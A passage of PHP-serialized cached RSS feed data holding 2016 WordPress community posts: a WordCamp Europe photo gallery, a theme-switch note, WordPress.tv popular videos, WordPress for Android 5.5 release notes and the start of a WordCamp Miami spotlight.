alt=\"Human Made ballers\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-66/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-66-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Human Made ballers 2\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-67/\"><img width=\"150\" height=\"137\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-67-150x137.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Even more Human Made ballers\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-68/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-68-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Ball dancers\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-69/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-69-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Ball dancers\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-70/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-70-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"WordPress Co-founders\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-71/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-71-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Joost\'s kicks\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-72/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-72-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Joost slick\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-73/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-73-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Mark Jaquith\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-74/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-74-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Power Convo\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-75/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-75-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Aaron\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-76/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-76-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Mika\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-77/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-77-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Jean\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-78/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-78-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Hat game\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-79/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-79-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Alain\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-80/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-80-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Contributors\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-81/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-81-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Nice stickers\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-82/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-82-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Cassidy\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-83/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-83-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Pascal\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-84/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-84-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Tammie\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-85/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-85-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Hugo and his awesome laptop\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-86/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-86-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Contributors\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-87/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-87-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Phone break\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-88/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-88-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"More Hugo\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-89/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-89-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Seriously, that laptop\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-90/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-90-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Matthew Haines-Young\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-91/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-91-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Impressed face?\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-92/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-92-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Collaboration\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-93/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-93-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"More collaboration\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-94/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-94-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Contributor day\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-95/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-95-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Break\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-96/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-96-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Konstantin\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-97/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-97-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Recording\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-98/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-98-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Chris\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-99/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-99-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Can\'t get enough Rarst\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-100/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-100-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-101/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-101-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Laughing\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-102/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-102-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Dominik\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-103/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-103-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Nikolay\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-104/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-104-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Working hard\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-105/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-105-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Helen judging Ryan\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-106/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-106-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"New Contributor Room\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-107/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-107-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Adam teaching\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-108/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-108-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"New contributors\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-109/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-109-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Accessibility testing\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-110/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-110-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"a11y collaboration\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-111/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-111-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Morten\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-112/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-112-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Listening\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-113/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-113-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Contributor\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-114/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-114-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Plugins\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-115/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-115-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Discussion\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-116/\"><img width=\"150\" height=\"100\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-116-150x100.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Lior\" /></a>\n<a href=\"https://poststatus.com/wordcamp-europe-2016-massive-success/wceu-2016-vienna-117/\"><img width=\"100\" height=\"150\" src=\"https://cdn.poststatus.com/wp-content/uploads/2016/07/wceu-2016-vienna-117-100x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"Brad\" /></a>\n\n<p> </p>\n<p>I’ll have more takeaways from WordCamp Europe <a href=\"https://poststatus.com/club\">in the member newsletter</a>, but for now, I hope you enjoy a few pictures! Thank you to the WordCamp Europe organizing team and volunteers for your efforts, and the entire European community for welcoming those of us who traveled from abroad. It was a blast, and I hope to see you again <a href=\"https://2017.europe.wordcamp.org/\">next year in Paris</a>!</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 07 Jul 2016 20:28:23 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"Joseph: Trying Out The Twenty Sixteen Theme\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://josephscott.org/?p=15135\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://blog.josephscott.org/2016/02/10/trying-out-the-twenty-sixteen-theme/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:547:\"<p>Switched to the <a href=\"https://wordpress.org/themes/twentysixteen/\">Twenty Sixteen WordPress Theme</a>.</p>\n<p><a href=\"https://blog.josephscott.org/wp-content/uploads/2016/02/twentysixteen-screenshot-1.png\" rel=\"attachment wp-att-15136\"><img src=\"https://blog.josephscott.org/wp-content/uploads/2016/02/twentysixteen-screenshot-1-1024x768.png\" alt=\"twentysixteen-screenshot\" width=\"840\" height=\"630\" class=\"aligncenter size-large wp-image-15136\" /></a></p>\n<p>I opted to remove the sidebar, to give more focus on the content of the page.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 05 Jul 2016 18:30:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"josephscott\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"WordPress.tv Blog: Most popular this month\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.wordpress.tv/?p=488\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://blog.wordpress.tv/2016/06/30/most-popular-this-month/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1603:\"<p>For the last month on WordPress.tv we had a little under 100,000 visits to our little corner of the internet. Here are the most popular videos from the last month. Enjoy!</p>\n<h2 class=\"video-title\">Mika Epstein: Plugin Reviews Demystified (How to Review a Plugin)</h2>\n<p>When you submit a plugin, it seems to fall into a big black box. Then, suddenly, you get an email telling you things that are incorrect and need some attention. What actually happens is at once incredibly simple and painstakingly annoying. I should know. I do it every single day. And I’m here to help you understand what it is.</p>\n<p></p>\n<p><a href=\"http://slides.halfelf.org/wcatl2016/#/\">Presentation Slides</a></p>\n<h2 class=\"video-title\">Kyle Maurer and Adam Silver: WP Battles: Plugins vs. Themes</h2>\n<p>The classic contest. Themes against plugins. Which are better? Which can solve your problems, fix your site and grow your business? In this epic showdown we’ll explore the purposes and use cases, pros and cons, strengths and weaknesses of these two critical components of any WordPress website.</p>\n<p></p>\n<p><a href=\"https://docs.google.com/presentation/d/1p9lcpexP-2AcwV4WtnfvlamoOSKJhTaa8OPlgqt_otQ/pub?start=false&\">Presentation Slides</a></p><br /> <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/wptvblog.wordpress.com/488/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/wptvblog.wordpress.com/488/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.wordpress.tv&blog=5310177&post=488&subd=wptvblog&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 30 Jun 2016 16:41:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Jerry Bates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"WP Mobile Apps: WordPress for Android: Version 5.5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://apps.wordpress.com/?p=3429\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://apps.wordpress.com/2016/06/28/wordpress-for-android-version-5-5/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3145:\"<h1>Visual Editor</h1>\n<p>We’ve worked hard to bring a new editor to the app — it’s a complete rewrite designed to bring you a much smoother editing experience. When you open a draft or a published post, you’ll now get a new visual editing experience with image, link, and styling tools like the ones you use in the full web version of WordPress.</p>\n<p>Advanced users, don’t worry! You’ll be able to switch to HTML view and edit code by tapping <em>HTML</em> on the bottom right:</p>\n<p><img class=\"alignnone wp-image-3402 size-large\" src=\"https://apps.files.wordpress.com/2016/05/screenshot-2016-05-04_11-49-14-480.png?w=614&h=1024\" alt=\"screenshot-2016-05-04_11.49.14.480\" width=\"614\" height=\"1024\" /></p>\n<div id=\"v-XuDHCGBJ-1\" class=\"video-player\">\n</div>\n<h1>People Management</h1>\n<p>You can now manage your WordPress.com site users. Simply access your user list with <em>People </em>link from <em>My Sites </em>screen<i> </i>and update your users’ role or remove them from your site.</p>\n<p><img class=\"alignnone wp-image-3469\" src=\"https://apps.files.wordpress.com/2016/06/device-2016-06-21-162615.png?w=605&h=1074\" alt=\"People Management\" width=\"605\" height=\"1074\" /></p>\n<h1>Other Changes</h1>\n<p>Version 5.5 also comes with a few other fixes:</p>\n<ul>\n<li>Fixed an issue when selecting a hidden site from search</li>\n</ul>\n<p>You can track our development progress for the next release by visiting <a href=\"https://github.com/wordpress-mobile/WordPress-Android/milestones/5.6\">our 5.6 milestone on GitHub</a>.</p>\n<h1>Beta</h1>\n<p>Do you like keeping up with what’s new in the app? Do you enjoy testing new stuff before anyone else? Our testers have access to beta versions with updates shipped directly through Google Play. The beta versions may have new features, new fixes — and possibly new bugs! Testers make it possible for us to improve the overall app experience, and offer us invaluable development feedback.</p>\n<p>Want to become a tester? <a href=\"https://play.google.com/apps/testing/org.wordpress.android\">Opt-in</a>!</p>\n<h1>Thank you</h1>\n<p>Thanks to our GitHub contributors: <a href=\"https://github.com/aerych\">@aerych</a>, <a href=\"https://github.com/aforcier\">@aforcier</a>, <a href=\"https://github.com/daniloercoli\">@daniloercoli</a>, <a href=\"https://github.com/hypest\">@hypest</a>, <a href=\"https://github.com/kwonye\">@kwonye</a>, <a href=\"https://github.com/maxme\">@maxme</a>, <a href=\"https://github.com/mzorz\">@mzorz</a>, <a href=\"https://github.com/nbradbury\">@nbradbury</a>, <a href=\"https://github.com/oguzkocer\">@oguzkocer</a>, <a href=\"https://github.com/roundhill\">@roundhill</a>, and <a href=\"https://github.com/tonyr59h\">@tonyr59h</a>.</p><img alt=\"\" border=\"0\" src=\"https://pixel.wp.com/b.gif?host=apps.wordpress.com&blog=108068616&post=3429&subd=apps&ref=&feed=1\" width=\"1\" height=\"1\" /><div><a href=\"https://apps.wordpress.com/2016/06/28/wordpress-for-android-version-5-5/\"><img alt=\"demo-visual-editor-edited2\" src=\"https://videos.files.wordpress.com/XuDHCGBJ/demo-visual-editor-edited2_std.original.jpg\" width=\"160\" height=\"120\" /></a></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 28 Jun 2016 14:54:16 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Maxime\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"WordPress.tv Blog: Spotlight: WordCamp Miami 2016\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.wordpress.tv/?p=464\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"http://blog.wordpress.tv/2016/06/22/spotlight-wordcamp-miami-2016/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2223:\"<p>WordCamp Miami helped kick off the 2016 WordCamp season with sunny skies and great presentations on how to take your WordPress site to the next level. You can see all the <a href=\"https://wordpress.tv/event/wordcamp-miami-2016/\">WordCamp Miami sessions here</a>, but below are a few that stood out for us.</p>\n<h2>\nRachel Carden: Tools and Techniques for Evaluating Accessibility</h2>\n<div id=\"v-o320Yj17-1\" 